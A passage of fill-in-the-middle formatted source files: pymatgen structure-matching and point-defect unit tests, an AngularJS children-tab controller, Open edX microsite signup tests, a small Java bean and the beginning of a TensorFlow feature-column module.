result = sm.get_s2_like_s1(s1, s2)
mindists = np.min(s1.lattice.get_all_distances(s1.frac_coords, result.frac_coords), axis=0)
self.assertLess(np.max(mindists), 1e-6)
self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords, [0, 0, 0.1])), 1)
self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords, [0.7, 0.4, 0.5])), 1)
# test with not enough sites in s1
s1 = Structure(l, ["Si", "Ag", "Cl"], [[0, 0, 0.1], [0, 0, 0.2], [0.7, 0.4, 0.5]])
s2 = Structure(l, ["Si", "Si"], [[0, 0.1, 0], [-0.7, 0.5, 0.4]])
self.assertEqual(sm.get_s2_like_s1(s1, s2), None)
def test_out_of_cell_s2_like_s1(self):
l = Lattice.cubic(5)
s1 = Structure(l, ["Si", "Ag", "Si"], [[0, 0, -0.02], [0, 0, 0.001], [0.7, 0.4, 0.5]])
s2 = Structure(l, ["Si", "Ag", "Si"], [[0, 0, 0.98], [0, 0, 0.99], [0.7, 0.4, 0.5]])
new_s2 = StructureMatcher(primitive_cell=False).get_s2_like_s1(s1, s2)
dists = np.sum((s1.cart_coords - new_s2.cart_coords) ** 2, axis=-1) ** 0.5
self.assertLess(np.max(dists), 0.1)
def test_disordered_primitive_to_ordered_supercell(self):
sm_atoms = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=True,
supercell_size="num_atoms",
comparator=OrderDisorderElementComparator(),
)
sm_sites = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=True,
supercell_size="num_sites",
comparator=OrderDisorderElementComparator(),
)
lp = Lattice.orthorhombic(10, 20, 30)
pcoords = [[0, 0, 0], [0.5, 0.5, 0.5]]
ls = Lattice.orthorhombic(20, 20, 30)
scoords = [[0, 0, 0], [0.75, 0.5, 0.5]]
prim = Structure(lp, [{"Na": 0.5}, {"Cl": 0.5}], pcoords)
supercell = Structure(ls, ["Na", "Cl"], scoords)
supercell.make_supercell([[-1, 1, 0], [0, 1, 1], [1, 0, 0]])
self.assertFalse(sm_sites.fit(prim, supercell))
self.assertTrue(sm_atoms.fit(prim, supercell))
self.assertRaises(ValueError, sm_atoms.get_s2_like_s1, prim, supercell)
self.assertEqual(len(sm_atoms.get_s2_like_s1(supercell, prim)), 4)
def test_ordered_primitive_to_disordered_supercell(self):
sm_atoms = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=True,
supercell_size="num_atoms",
comparator=OrderDisorderElementComparator(),
)
sm_sites = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=True,
supercell_size="num_sites",
comparator=OrderDisorderElementComparator(),
)
lp = Lattice.orthorhombic(10, 20, 30)
pcoords = [[0, 0, 0], [0.5, 0.5, 0.5]]
ls = Lattice.orthorhombic(20, 20, 30)
scoords = [[0, 0, 0], [0.5, 0, 0], [0.25, 0.5, 0.5], [0.75, 0.5, 0.5]]
s1 = Structure(lp, ["Na", "Cl"], pcoords)
s2 = Structure(ls, [{"Na": 0.5}, {"Na": 0.5}, {"Cl": 0.5}, {"Cl": 0.5}], scoords)
self.assertTrue(sm_sites.fit(s1, s2))
self.assertFalse(sm_atoms.fit(s1, s2))
def test_disordered_to_disordered(self):
sm_atoms = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=False,
comparator=OrderDisorderElementComparator(),
)
lp = Lattice.orthorhombic(10, 20, 30)
coords = [[0.0, 0.0, 0.0], [0.5, 0.5, 0.5]]
s1 = Structure(lp, [{"Na": 0.5, "Cl": 0.5}, {"Na": 0.5, "Cl": 0.5}], coords)
s2 = Structure(lp, [{"Na": 0.5, "Cl": 0.5}, {"Na": 0.5, "Br": 0.5}], coords)
self.assertFalse(sm_atoms.fit(s1, s2))
def test_occupancy_comparator(self):
lp = Lattice.orthorhombic(10, 20, 30)
pcoords = [[0, 0, 0], [0.5, 0.5, 0.5]]
s1 = Structure(lp, [{"Na": 0.6, "K": 0.4}, "Cl"], pcoords)
s2 = Structure(lp, [{"Xa": 0.4, "Xb": 0.6}, "Cl"], pcoords)
s3 = Structure(lp, [{"Xa": 0.5, "Xb": 0.5}, "Cl"], pcoords)
sm_sites = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=True,
supercell_size="num_sites",
comparator=OccupancyComparator(),
)
self.assertTrue(sm_sites.fit(s1, s2))
self.assertFalse(sm_sites.fit(s1, s3))
def test_electronegativity(self):
sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5)
s1 = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "Na2Fe2PAsO4S4.json"))
s2 = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "Na2Fe2PNO4Se4.json"))
self.assertEqual(
sm.get_best_electronegativity_anonymous_mapping(s1, s2),
{
Element("S"): Element("Se"),
Element("As"): Element("N"),
Element("Fe"): Element("Fe"),
Element("Na"): Element("Na"),
Element("P"): Element("P"),
Element("O"): Element("O"),
},
)
self.assertEqual(len(sm.get_all_anonymous_mappings(s1, s2)), 2)
# test include_dist
dists = {Element("N"): 0, Element("P"): 0.0010725064}
for mapping, d in sm.get_all_anonymous_mappings(s1, s2, include_dist=True):
self.assertAlmostEqual(dists[mapping[Element("As")]], d)
def test_rms_vs_minimax(self):
# This tests that structures whose adjusted RMS is below stol, but whose
# minimax (largest single-site) distance is above stol, are treated properly
# stol=0.3 gives exactly an ftol of 0.1 on the c axis
sm = StructureMatcher(ltol=0.2, stol=0.301, angle_tol=1, primitive_cell=False)
l = Lattice.orthorhombic(1, 2, 12)
sp = ["Si", "Si", "Al"]
s1 = Structure(l, sp, [[0.5, 0, 0], [0, 0, 0], [0, 0, 0.5]])
s2 = Structure(l, sp, [[0.5, 0, 0], [0, 0, 0], [0, 0, 0.6]])
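# The Al site is displaced by 0.1 * c = 1.2 A. The best translation spreads
# this over all 3 sites, leaving displacements of (0.4, 0.4, 0.8) A, i.e.
# (0.2, 0.2, 0.4) after dividing by (vol / nsites) ** (1 / 3) = 2, so
# rms = sqrt(0.32) / 2 while the minimax distance is 0.4 > stol.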
self.assertArrayAlmostEqual(sm.get_rms_dist(s1, s2), (0.32 ** 0.5 / 2, 0.4))
self.assertEqual(sm.fit(s1, s2), False)
self.assertEqual(sm.fit_anonymous(s1, s2), False)
self.assertEqual(sm.get_mapping(s1, s2), None)
class PointDefectComparatorTest(PymatgenTest):
def test_defect_matching(self):
# SETUP DEFECTS FOR TESTING
# symmorphic defect test set
s_struc = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "CsSnI3.cif")) # tetragonal CsSnI3
identical_Cs_vacs = [Vacancy(s_struc, s_struc[0]), Vacancy(s_struc, s_struc[1])]
identical_I_vacs_sublattice1 = [
Vacancy(s_struc, s_struc[4]),
Vacancy(s_struc, s_struc[5]),
Vacancy(s_struc, s_struc[8]),
Vacancy(s_struc, s_struc[9]),
] # in plane halides
identical_I_vacs_sublattice2 = [
Vacancy(s_struc, s_struc[6]),
Vacancy(s_struc, s_struc[7]),
] # out of plane halides
pdc = PointDefectComparator()
# NOW TEST DEFECTS
# test vacancy matching
self.assertTrue(pdc.are_equal(identical_Cs_vacs[0], identical_Cs_vacs[0])) # trivial vacancy test
self.assertTrue(pdc.are_equal(identical_Cs_vacs[0], identical_Cs_vacs[1])) # vacancies on same sublattice
for i, j in itertools.combinations(range(4), 2):
self.assertTrue(pdc.are_equal(identical_I_vacs_sublattice1[i], identical_I_vacs_sublattice1[j]))
self.assertTrue(pdc.are_equal(identical_I_vacs_sublattice2[0], identical_I_vacs_sublattice2[1]))
self.assertFalse(
pdc.are_equal(
identical_Cs_vacs[0],
# both vacancies, but different specie types
identical_I_vacs_sublattice1[0],
)
)
self.assertFalse(
pdc.are_equal(
identical_I_vacs_sublattice1[0],
# same specie type, different sublattice
identical_I_vacs_sublattice2[0],
)
)
# test substitutional matching
sub_Cs_on_I_sublattice1_set1 = PeriodicSite(
"Cs", identical_I_vacs_sublattice1[0].site.frac_coords, s_struc.lattice
)
sub_Cs_on_I_sublattice1_set2 = PeriodicSite(
"Cs", identical_I_vacs_sublattice1[1].site.frac_coords, s_struc.lattice
)
sub_Cs_on_I_sublattice2 = PeriodicSite("Cs", identical_I_vacs_sublattice2[0].site.frac_coords, s_struc.lattice)
sub_Rb_on_I_sublattice2 = PeriodicSite("Rb", identical_I_vacs_sublattice2[0].site.frac_coords, s_struc.lattice)
self.assertTrue(
pdc.are_equal( # trivial substitution test
Substitution(s_struc, sub_Cs_on_I_sublattice1_set1),
Substitution(s_struc, sub_Cs_on_I_sublattice1_set1),
)
)
self.assertTrue(
pdc.are_equal( # same sublattice, different coords
Substitution(s_struc, sub_Cs_on_I_sublattice1_set1),
Substitution(s_struc, sub_Cs_on_I_sublattice1_set2),
)
)
self.assertFalse(
pdc.are_equal( # different subs (wrong specie)
Substitution(s_struc, sub_Cs_on_I_sublattice2),
Substitution(s_struc, sub_Rb_on_I_sublattice2),
)
)
self.assertFalse(
pdc.are_equal( # different subs (wrong sublattice)
Substitution(s_struc, sub_Cs_on_I_sublattice1_set1),
Substitution(s_struc, sub_Cs_on_I_sublattice2),
)
)
# test symmorphic interstitial matching
# (using set generated from Voronoi generator, with same sublattice given by
# the saturated_interstitial_structure function)
inter_H_sublattice1_set1 = PeriodicSite("H", [0.0, 0.75, 0.25], s_struc.lattice)
inter_H_sublattice1_set2 = PeriodicSite("H", [0.0, 0.75, 0.75], s_struc.lattice)
inter_H_sublattice2 = PeriodicSite("H", [0.57796112, 0.06923687, 0.56923687], s_struc.lattice)
inter_H_sublattice3 = PeriodicSite("H", [0.25, 0.25, 0.54018268], s_struc.lattice)
inter_He_sublattice3 = PeriodicSite("He", [0.25, 0.25, 0.54018268], s_struc.lattice)
self.assertTrue(
pdc.are_equal( # trivial interstitial test
Interstitial(s_struc, inter_H_sublattice1_set1),
Interstitial(s_struc, inter_H_sublattice1_set1),
)
)
self.assertTrue(
pdc.are_equal( # same sublattice, different coords
Interstitial(s_struc, inter_H_sublattice1_set1),
Interstitial(s_struc, inter_H_sublattice1_set2),
)
)
self.assertFalse(
pdc.are_equal( # different interstitials (wrong sublattice)
Interstitial(s_struc, inter_H_sublattice1_set1),
Interstitial(s_struc, inter_H_sublattice2),<|fim▁hole|> pdc.are_equal( # different interstitials (wrong sublattice)
Interstitial(s_struc, inter_H_sublattice1_set1),
Interstitial(s_struc, inter_H_sublattice3),
)
)
self.assertFalse(
pdc.are_equal( # different interstitials (wrong specie)
Interstitial(s_struc, inter_H_sublattice3),
Interstitial(s_struc, inter_He_sublattice3),
)
)
# test non-symmorphic interstitial matching
# (using set generated from Voronoi generator, with same sublattice given by
# the saturated_interstitial_structure function)
ns_struc = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "CuCl.cif"))
ns_inter_H_sublattice1_set1 = PeriodicSite("H", [0.06924513, 0.06308959, 0.86766528], ns_struc.lattice)
ns_inter_H_sublattice1_set2 = PeriodicSite("H", [0.43691041, 0.36766528, 0.06924513], ns_struc.lattice)
ns_inter_H_sublattice2 = PeriodicSite("H", [0.06022109, 0.60196031, 0.1621814], ns_struc.lattice)
ns_inter_He_sublattice2 = PeriodicSite("He", [0.06022109, 0.60196031, 0.1621814], ns_struc.lattice)
self.assertTrue(
pdc.are_equal( # trivial interstitial test
Interstitial(ns_struc, ns_inter_H_sublattice1_set1),
Interstitial(ns_struc, ns_inter_H_sublattice1_set1),
)
)
self.assertTrue(
pdc.are_equal( # same sublattice, different coords
Interstitial(ns_struc, ns_inter_H_sublattice1_set1),
Interstitial(ns_struc, ns_inter_H_sublattice1_set2),
)
)
self.assertFalse(
pdc.are_equal(
Interstitial(ns_struc, ns_inter_H_sublattice1_set1),
# different interstitials (wrong sublattice)
Interstitial(ns_struc, ns_inter_H_sublattice2),
)
)
self.assertFalse(
pdc.are_equal( # different interstitials (wrong specie)
Interstitial(ns_struc, ns_inter_H_sublattice2),
Interstitial(ns_struc, ns_inter_He_sublattice2),
)
)
# test influence of charge on defect matching (default is to be charge agnostic)
vac_diff_chg = identical_Cs_vacs[0].copy()
vac_diff_chg.set_charge(3.0)
self.assertTrue(pdc.are_equal(identical_Cs_vacs[0], vac_diff_chg))
chargecheck_pdc = PointDefectComparator(check_charge=True) # switch to PDC which cares about charge state
self.assertFalse(chargecheck_pdc.are_equal(identical_Cs_vacs[0], vac_diff_chg))
# test different supercell size
# (comparing same defect but different supercells - default is to not check for this)
sc_agnostic_pdc = PointDefectComparator(check_primitive_cell=True)
sc_scaled_s_struc = s_struc.copy()
sc_scaled_s_struc.make_supercell([2, 2, 3])
sc_scaled_I_vac_sublatt1_ps1 = PeriodicSite(
"I",
identical_I_vacs_sublattice1[0].site.coords,
sc_scaled_s_struc.lattice,
coords_are_cartesian=True,
)
sc_scaled_I_vac_sublatt1_ps2 = PeriodicSite(
"I",
identical_I_vacs_sublattice1[1].site.coords,
sc_scaled_s_struc.lattice,
coords_are_cartesian=True,
)
sc_scaled_I_vac_sublatt2_ps = PeriodicSite(
"I",
identical_I_vacs_sublattice2[1].site.coords,
sc_scaled_s_struc.lattice,
coords_are_cartesian=True,
)
sc_scaled_I_vac_sublatt1_defect1 = Vacancy(sc_scaled_s_struc, sc_scaled_I_vac_sublatt1_ps1)
sc_scaled_I_vac_sublatt1_defect2 = Vacancy(sc_scaled_s_struc, sc_scaled_I_vac_sublatt1_ps2)
sc_scaled_I_vac_sublatt2_defect = Vacancy(sc_scaled_s_struc, sc_scaled_I_vac_sublatt2_ps)
self.assertFalse(
pdc.are_equal(
identical_I_vacs_sublattice1[0],
# trivially same defect site but between different supercells
sc_scaled_I_vac_sublatt1_defect1,
)
)
self.assertTrue(sc_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0], sc_scaled_I_vac_sublatt1_defect1))
self.assertFalse(
pdc.are_equal(
identical_I_vacs_sublattice1[1],
# same coords, different lattice structure
sc_scaled_I_vac_sublatt1_defect1,
)
)
self.assertTrue(sc_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[1], sc_scaled_I_vac_sublatt1_defect1))
self.assertFalse(
pdc.are_equal(
identical_I_vacs_sublattice1[0],
# same sublattice, different coords
sc_scaled_I_vac_sublatt1_defect2,
)
)
self.assertTrue(sc_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0], sc_scaled_I_vac_sublatt1_defect2))
self.assertFalse(
sc_agnostic_pdc.are_equal(
identical_I_vacs_sublattice1[0],
# different defects (wrong sublattice)
sc_scaled_I_vac_sublatt2_defect,
)
)
# test same structure size, but scaled lattice volume
# (default is to not allow these to be equal, but check_lattice_scale=True allows for this)
vol_agnostic_pdc = PointDefectComparator(check_lattice_scale=True)
vol_scaled_s_struc = s_struc.copy()
vol_scaled_s_struc.scale_lattice(s_struc.volume * 0.95)
vol_scaled_I_vac_sublatt1_defect1 = Vacancy(vol_scaled_s_struc, vol_scaled_s_struc[4])
vol_scaled_I_vac_sublatt1_defect2 = Vacancy(vol_scaled_s_struc, vol_scaled_s_struc[5])
vol_scaled_I_vac_sublatt2_defect = Vacancy(vol_scaled_s_struc, vol_scaled_s_struc[6])
self.assertFalse(
pdc.are_equal(
identical_I_vacs_sublattice1[0],
# trivially same defect (but vol change)
vol_scaled_I_vac_sublatt1_defect1,
)
)
self.assertTrue(vol_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0], vol_scaled_I_vac_sublatt1_defect1))
self.assertFalse(
pdc.are_equal(
identical_I_vacs_sublattice1[0],
# same defect, different sublattice point (and vol change)
vol_scaled_I_vac_sublatt1_defect2,
)
)
self.assertTrue(vol_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0], vol_scaled_I_vac_sublatt1_defect2))
self.assertFalse(
vol_agnostic_pdc.are_equal(
identical_I_vacs_sublattice1[0],
# different defect (wrong sublattice)
vol_scaled_I_vac_sublatt2_defect,
)
)
# test identical defect which has had entire lattice shifted
shift_s_struc = s_struc.copy()
shift_s_struc.translate_sites(range(len(s_struc)), [0.2, 0.3, 0.4], frac_coords=True, to_unit_cell=True)
shifted_identical_Cs_vacs = [
Vacancy(shift_s_struc, shift_s_struc[0]),
Vacancy(shift_s_struc, shift_s_struc[1]),
]
self.assertTrue(
pdc.are_equal(
identical_Cs_vacs[0],
# trivially same defect (but shifted)
shifted_identical_Cs_vacs[0],
)
)
self.assertTrue(
pdc.are_equal(
identical_Cs_vacs[0],
# same defect on different sublattice point (and shifted)
shifted_identical_Cs_vacs[1],
)
)
# test uniform lattice shift within non-symmorphic structure
shift_ns_struc = ns_struc.copy()
shift_ns_struc.translate_sites(range(len(ns_struc)), [0.0, 0.6, 0.3], frac_coords=True, to_unit_cell=True)
shift_ns_inter_H_sublattice1_set1 = PeriodicSite(
"H",
ns_inter_H_sublattice1_set1.frac_coords + [0.0, 0.6, 0.3],
shift_ns_struc.lattice,
)
shift_ns_inter_H_sublattice1_set2 = PeriodicSite(
"H",
ns_inter_H_sublattice1_set2.frac_coords + [0.0, 0.6, 0.3],
shift_ns_struc.lattice,
)
self.assertTrue(
pdc.are_equal(
Interstitial(ns_struc, ns_inter_H_sublattice1_set1),
# trivially same defect (but shifted)
Interstitial(shift_ns_struc, shift_ns_inter_H_sublattice1_set1),
)
)
self.assertTrue(
pdc.are_equal(
Interstitial(ns_struc, ns_inter_H_sublattice1_set1),
# same defect on different sublattice point (and shifted)
Interstitial(shift_ns_struc, shift_ns_inter_H_sublattice1_set2),
)
)
# test a rotational + supercell type structure transformation (requires check_primitive_cell=True)
rotated_s_struc = s_struc.copy()
rotated_s_struc.make_supercell([[2, 1, 0], [-1, 3, 0], [0, 0, 2]])
rotated_identical_Cs_vacs = [
Vacancy(rotated_s_struc, rotated_s_struc[0]),
Vacancy(rotated_s_struc, rotated_s_struc[1]),
]
self.assertFalse(
pdc.are_equal(
identical_Cs_vacs[0],
# trivially same defect (but rotated)
rotated_identical_Cs_vacs[0],
)
)
self.assertTrue(sc_agnostic_pdc.are_equal(identical_Cs_vacs[0], rotated_identical_Cs_vacs[0]))
self.assertFalse(
pdc.are_equal(
identical_Cs_vacs[0],
# same defect on different sublattice (and rotated)
rotated_identical_Cs_vacs[1],
)
)
self.assertTrue(
sc_agnostic_pdc.are_equal(
identical_Cs_vacs[0],
# same defect on different sublattice point (and rotated)
rotated_identical_Cs_vacs[1],
)
)
# test a rotational + supercell + shift type structure transformation for non-symmorphic structure
rotANDshift_ns_struc = ns_struc.copy()
rotANDshift_ns_struc.translate_sites(range(len(ns_struc)), [0.0, 0.6, 0.3], frac_coords=True, to_unit_cell=True)
rotANDshift_ns_struc.make_supercell([[2, 1, 0], [-1, 3, 0], [0, 0, 2]])
ns_vac_Cs_set1 = Vacancy(ns_struc, ns_struc[0])
rotANDshift_ns_vac_Cs_set1 = Vacancy(rotANDshift_ns_struc, rotANDshift_ns_struc[0])
rotANDshift_ns_vac_Cs_set2 = Vacancy(rotANDshift_ns_struc, rotANDshift_ns_struc[1])
self.assertTrue(
sc_agnostic_pdc.are_equal(
ns_vac_Cs_set1,
# trivially same defect (but rotated and sublattice shifted)
rotANDshift_ns_vac_Cs_set1,
)
)
self.assertTrue(
sc_agnostic_pdc.are_equal(
ns_vac_Cs_set1,
# same defect on different sublattice point (shifted and rotated)
rotANDshift_ns_vac_Cs_set2,
)
)
if __name__ == "__main__":
unittest.main()<|fim▁end|> | )
)
self.assertFalse( |
<|file_name|>my-children-controller.js<|end_file_name|><|fim▁begin|>/* global _, angular */
'use strict';
function myChildrenCtrl ($scope, $state, $translate, ownProfile, cdUsersService) {
$scope.parentProfileData = ownProfile.data;
$scope.tabs = [];
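// Builds one tab per child (sorted by name) plus a trailing "Add Child" tab.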
function loadChildrenTabs () {
$scope.tabs = [];
cdUsersService.loadChildrenForUser($scope.parentProfileData.userId, function (children) {
$scope.children = _.sortBy(children, [
function (child) {
return child.name.toLowerCase();
}
]);
$scope.tabs = $scope.children.map(function (child) {
return {
state: 'my-children.child',
stateParams: {id: child.userId},
tabImage: '/api/2.0/profiles/' + child.id + '/avatar_img',
tabTitle: child.name,
tabSubTitle: child.alias
};
});
$scope.tabs.push({
state: 'my-children.add',
tabImage: '/img/avatars/avatar.png',
tabTitle: $translate.instant('Add Child')
});
});
}
loadChildrenTabs();
$scope.$on('$stateChangeStart', function (e, toState, params) {
if (toState.name === 'my-children.child') {
var childLoaded = _.some($scope.children, function (child) {
return child.userId === params.id;<|fim▁hole|> loadChildrenTabs();
}
}
});
}
angular.module('cpZenPlatform')
.controller('my-children-controller', ['$scope', '$state', '$translate', 'ownProfile', 'cdUsersService', myChildrenCtrl]);<|fim▁end|> | });
if (!childLoaded) { |
<|file_name|>test_microsite.py<|end_file_name|><|fim▁begin|>"""
Tests for user creation from microsites.
"""
from django.test import TestCase
from student.models import UserSignupSource
import mock
import json
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
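# Fake microsite configuration returned by the get_value mocks below.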
FAKE_MICROSITE = {
"SITE_NAME": "openedx.localhost",
"university": "fakeuniversity",
"course_org_filter": "fakeorg",
"REGISTRATION_EXTRA_FIELDS": {
"address1": "required",
"city": "required",
"state": "required",
"country": "required",
"company": "required",
"title": "required"
},
"extended_profile_fields": [
"address1", "state", "company", "title"
]
}
def fake_site_name(name, default=None):
"""
Return a fake microsite site name.
"""
if name == 'SITE_NAME':
return 'openedx.localhost'
else:
return default
<|fim▁hole|> """
Return a fake microsite configuration value.
"""
return FAKE_MICROSITE.get(name, default)
class TestMicrosite(TestCase):
"""Test for Account Creation from a white labeled Micro-Sites"""
def setUp(self):
super(TestMicrosite, self).setUp()
self.username = "test_user"
self.url = reverse("create_account")
self.params = {
"username": self.username,
"email": "[email protected]",
"password": "testpass",
"name": "Test User",
"honor_code": "true",
"terms_of_service": "true",
}
self.extended_params = dict(self.params.items() + {
"address1": "foo",
"city": "foo",
"state": "foo",
"country": "foo",
"company": "foo",
"title": "foo"
}.items())
@mock.patch("microsite_configuration.microsite.get_value", fake_site_name)
def test_user_signup_source(self):
"""
Test that creating a user from the microsite saves a record in the
UserSignupSource table.
"""
response = self.client.post(self.url, self.params)
self.assertEqual(response.status_code, 200)
self.assertGreater(len(UserSignupSource.objects.filter(site='openedx.localhost')), 0)
def test_user_signup_from_non_micro_site(self):
"""
Test that creating a user from a non-microsite saves no record in the
UserSignupSource table.
"""
response = self.client.post(self.url, self.params)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(UserSignupSource.objects.filter(site='openedx.localhost')), 0)
@mock.patch("microsite_configuration.microsite.get_value", fake_microsite_get_value)
def test_user_signup_missing_enhanced_profile(self):
"""
Test creating a user from the microsite without providing any of the
microsite-specific profile information.
"""
response = self.client.post(self.url, self.params)
self.assertEqual(response.status_code, 400)
@mock.patch("microsite_configuration.microsite.get_value", fake_microsite_get_value)
def test_user_signup_including_enhanced_profile(self):
"""
Test creating a user from the microsite while providing all of the
microsite-specific profile information.
"""
response = self.client.post(self.url, self.extended_params)
self.assertEqual(response.status_code, 200)
user = User.objects.get(username=self.username)
meta = json.loads(user.profile.meta)
self.assertEqual(meta['address1'], 'foo')
self.assertEqual(meta['state'], 'foo')
self.assertEqual(meta['company'], 'foo')
self.assertEqual(meta['title'], 'foo')<|fim▁end|> | def fake_microsite_get_value(name, default=None): |
<|file_name|>ShapeService.java<|end_file_name|><|fim▁begin|>package com.sp.jb.service;
import com.sp.jb.model.Circle;
import com.sp.jb.model.Triangle;
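/** Simple holder bean exposing Circle and Triangle collaborators, e.g. for Spring setter injection. */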
public class ShapeService {
private Circle circle;<|fim▁hole|> private Triangle triangle;
public Circle getCircle() {
return circle;
}
public void setCircle(Circle circle) {
this.circle = circle;
}
public Triangle getTriangle() {
return triangle;
}
public void setTriangle(Triangle triangle) {
this.triangle = triangle;
}
}<|fim▁end|> | |
<|file_name|>feature_column_ops.py<|end_file_name|><|fim▁begin|># Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities related to FeatureColumn."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.framework.python.framework import checkpoint_utils
from tensorflow.contrib.framework.python.framework import experimental
from tensorflow.contrib.framework.python.ops import variables as contrib_variables
from tensorflow.contrib.layers.python.layers import embedding_ops
from tensorflow.contrib.layers.python.layers import feature_column as fc
from tensorflow.contrib.layers.python.layers import layers
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor as sparse_tensor_py
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
def _embeddings_from_arguments(column,
args,
weight_collections,
trainable,
output_rank=2):
"""Returns embeddings for a column based on the computed arguments.
Args:
column: the feature column (used for naming and checkpoint lookup).
args: the _DeepEmbeddingLookupArguments for this column.
weight_collections: collections to store weights in.
trainable: whether these embeddings should be trainable.
output_rank: the desired rank of the returned `Tensor`. Inner dimensions will
be combined to produce the desired rank.
Returns:
the embeddings.
Raises:
ValueError: if not possible to create.
"""
# pylint: disable=protected-access
input_tensor = layers._inner_flatten(args.input_tensor, output_rank)
weight_tensor = None
if args.weight_tensor is not None:
weight_tensor = layers._inner_flatten(args.weight_tensor, output_rank)
# pylint: enable=protected-access
if args.hashed:
embeddings = contrib_variables.model_variable(
name='weights',
shape=[args.vocab_size],
dtype=dtypes.float32,
initializer=args.initializer,
trainable=trainable,
collections=weight_collections)
return embedding_ops.hashed_embedding_lookup_sparse(
embeddings, input_tensor, args.dimension,
combiner=args.combiner, name='lookup')
if args.shared_embedding_name is not None:
shared_embedding_collection_name = (
'SHARED_EMBEDDING_COLLECTION_' + args.shared_embedding_name.upper())
graph = ops.get_default_graph()
shared_embedding_collection = (
graph.get_collection_ref(shared_embedding_collection_name))
shape = [args.vocab_size, args.dimension]
if shared_embedding_collection:
if len(shared_embedding_collection) > 1:
raise ValueError('Collection %s can only contain one '
'(partitioned) variable.'
% shared_embedding_collection_name)
else:
embeddings = shared_embedding_collection[0]
if embeddings.get_shape() != shape:
raise ValueError('The embedding variable with name {} already '
'exists, but its shape does not match required '
'embedding shape here. Please make sure to use '
'different shared_embedding_name for different '
'shared embeddings.'.format(
args.shared_embedding_name))
else:
embeddings = contrib_variables.model_variable(
name=args.shared_embedding_name,
shape=shape,
dtype=dtypes.float32,
initializer=args.initializer,
trainable=trainable,
collections=weight_collections)
graph.add_to_collection(shared_embedding_collection_name, embeddings)
else:
embeddings = contrib_variables.model_variable(
name='weights',
shape=[args.vocab_size, args.dimension],
dtype=dtypes.float32,
initializer=args.initializer,
trainable=trainable,
collections=weight_collections)
if isinstance(embeddings, variables.Variable):
embeddings = [embeddings]
else:
embeddings = embeddings._get_variable_list() # pylint: disable=protected-access
# pylint: disable=protected-access
_maybe_restore_from_checkpoint(
column._checkpoint_path(), embeddings)
return embedding_ops.safe_embedding_lookup_sparse(
embeddings,
input_tensor,
sparse_weights=weight_tensor,
combiner=args.combiner,
name=column.name + '_weights')
def _input_from_feature_columns(columns_to_tensors,
feature_columns,
weight_collections,
trainable,
scope,
output_rank,
default_name):
"""Implementation of `input_from(_sequence)_feature_columns`."""
check_feature_columns(feature_columns)
with variable_scope.variable_scope(scope,
default_name=default_name,
values=columns_to_tensors.values()):
output_tensors = []
transformer = _Transformer(columns_to_tensors)
if weight_collections:
weight_collections = list(set(list(weight_collections) +
[ops.GraphKeys.GLOBAL_VARIABLES]))
for column in sorted(set(feature_columns), key=lambda x: x.key):
with variable_scope.variable_scope(None,
default_name=column.name,
values=columns_to_tensors.values()):
transformed_tensor = transformer.transform(column)
try:
# pylint: disable=protected-access
arguments = column._deep_embedding_lookup_arguments(
transformed_tensor)
output_tensors.append(_embeddings_from_arguments(
column,
arguments,
weight_collections,
trainable,
output_rank=output_rank))
except NotImplementedError as ee:
try:
# pylint: disable=protected-access
output_tensors.append(column._to_dnn_input_layer(
transformed_tensor,
weight_collections,
trainable,
output_rank=output_rank))
except ValueError as e:
raise ValueError('Error creating input layer for column: {}.\n'
'{}, {}'.format(column.name, e, ee))
return array_ops.concat(output_rank - 1, output_tensors)
def input_from_feature_columns(columns_to_tensors,
feature_columns,
weight_collections=None,
trainable=True,
scope=None):
"""A tf.contrib.layer style input layer builder based on FeatureColumns.
Generally a single example in training data is described with feature columns.
At the first layer of the model, this column oriented data should be converted
to a single tensor. Each feature column needs a different kind of operation
during this conversion. For example sparse features need a totally different
handling than continuous features.
An example usage of input_from_feature_columns is as follows:
# Building model for training
columns_to_tensor = tf.parse_example(...)
first_layer = input_from_feature_columns(
columns_to_tensors=columns_to_tensor,
feature_columns=feature_columns)
second_layer = fully_connected(first_layer, ...)
...
where feature_columns can be defined as follows:
occupation = sparse_column_with_hash_bucket(column_name="occupation",
hash_bucket_size=1000)
